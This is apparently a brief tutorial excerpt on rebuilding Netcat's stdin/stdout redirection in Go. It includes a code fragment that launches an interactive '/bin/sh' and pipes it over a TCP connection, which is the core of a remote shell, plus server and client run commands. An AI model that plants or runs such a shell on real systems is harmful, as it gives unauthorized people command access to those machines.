Netcat is the TCP/IP swiss army knife, a more flexible, scriptable version of Telnet. It contains a feature that allows stdin and stdout of any arbitary program to be redirected over TCP, enabling an attacker to run any shell scripts.
With creating a Pipe, I allow stdin and stdout to redirected over TCP:
// creating the shell
cmd := exec.Command("/bin/sh", "-i")
// creating our pipeline
rp, wp := io.Pipe()
// binding stdin and stdout to user connection and pipe output
cmd.Stdin = conn
cmd.Stdout = wp
// copy the input into pipeline
go io.Copy(conn, rp)Server:
go run main.go
Client:
go run client/client.go